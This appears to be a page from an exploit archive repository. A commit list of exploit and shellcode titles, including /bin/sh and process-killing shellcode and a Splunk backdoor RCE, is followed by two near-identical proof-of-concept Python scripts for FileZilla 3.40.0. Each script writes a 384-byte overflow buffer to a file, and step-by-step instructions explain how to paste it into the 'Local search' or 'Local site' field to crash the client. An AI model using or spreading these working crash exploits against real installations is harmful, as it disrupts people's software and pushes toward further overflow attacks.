
20 changes to exploits/shellcodes Microsoft Edge Chakra 1.11.4 - Read Permission via Type Confusion FileZilla 3.40.0 - 'Local search' / 'Local site' Denial of Service (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (1) STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (2) symphony CMS 2.3 - Multiple Vulnerabilities Symphony CMS 2.3 - Multiple Vulnerabilities Mpay24 PrestaShop Payment Module 1.5 - Multiple Vulnerabilities Raisecom XPON ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 - Remote Code Execution zzzphp CMS 1.6.1 - Cross-Site Request Forgery Splunk Enterprise 7.2.4 - Custom App RCE (Persistent Backdoor - Custom Binary Payload) Booked Scheduler 2.7.5 - Remote Command Execution (Metasploit) OOP CMS BLOG 1.0 - Multiple SQL Injection OOP CMS BLOG 1.0 - Multiple Cross-Site Request Forgery CMSsite 1.0 - Multiple Cross-Site Request Forgery elFinder 2.1.47 - Command Injection vulnerability in the PHP connector MarcomCentral FusionPro VDP Creator < 10.0 - Directory Traversal Bolt CMS 3.6.4 - Cross-Site Scripting Craft CMS 3.1.12 Pro - Cross-Site Scripting WordPress Plugin Cerber Security_ Antispam & Malware Scan 8.0 - Multiple Bypass Vulnerabilities Fiberhome AN5506-04-F RP2669 - Persistent Cross-Site Scripting Linux/x86 - NOT Encoder / Decoder - execve() /bin/sh Shellcode (44 bytes) Linux/x64 - Kill All Processes Shellcode (11 bytes) Linux/x86 - iptables -F Shellcode (43 bytes)
56 lines
No EOL
1.9 KiB
Text
56 lines
No EOL
1.9 KiB
Text
# Exploit Title: FileZilla 3.40.0 - "Local search" Denial of Service (PoC)
|
|
# Discovery by: Mr Winst0n
|
|
# Discovery Date: February 20, 2019
|
|
# Vendor Homepage: https://filezilla-project.org
|
|
# Software Link : https://filezilla-project.org/download.php?type=client&show_all=1
|
|
# Tested Version: 3.40.0
|
|
# Tested on: Kali linux x86_64
|
|
# Vulnerability Type: Denial of Service (DoS)
|
|
|
|
|
|
# Steps to Produce the Crash:
|
|
# 1.- Run python code : python filezilla.py
|
|
# 2.- Open buff.txt and copy content to clipboard
|
|
# 3.- Open Filezilla (located in bin folder), in top bar click on Binoculars icon (search for files recursively)
|
|
# 4.- In the opend window, Set Search type to "Local search"
|
|
# 5.- Paste ClipBoard on "Search directory" and click on "Search"
|
|
# 6.- Boom! Crashed...
|
|
|
|
|
|
#!/usr/bin/env python
|
|
|
|
buffer = "\x41" * 384
|
|
crash = "/" + buffer + "BBBB" + "CCCC"
|
|
f = open("buff.txt", "w")
|
|
f.write(crash)
|
|
f.close()
|
|
|
|
# Note: If you have not "/" before payload, you should add it to begining of payload, So the program recognizes it as a valid path.
|
|
|
|
|
|
# Exploit Title: FileZilla 3.40.0 - "Local site" Denial of Service (PoC)
|
|
# Discovery by: Mr Winst0n
|
|
# Discovery Date: February 25, 2019
|
|
# Vendor Homepage: https://filezilla-project.org
|
|
# Software Link : https://filezilla-project.org/download.php?type=client&show_all=1
|
|
# Tested Version: 3.40.0
|
|
# Tested on: Kali linux x86_64
|
|
# Vulnerability Type: Denial of Service (DoS)
|
|
|
|
|
|
# Steps to Produce the Crash:
|
|
# 1.- Run python code : python filezilla-2.py
|
|
# 2.- Open crash.txt and copy content to clipboard
|
|
# 3.- In "Local site" section paste clipboard and Enter.
|
|
# 4.- Boom! Crashed...
|
|
|
|
|
|
#!/usr/bin/env python
|
|
|
|
buffer = "\x41" * 384
|
|
crash = "/" + buffer + "BBBB" + "CCCC"
|
|
f = open("crash.txt", "w")
|
|
f.write(crash)
|
|
f.close()
|
|
|
|
# Note: If you have not "/" before payload, you should add it to begining of payload, So the program recognizes it as a valid path. |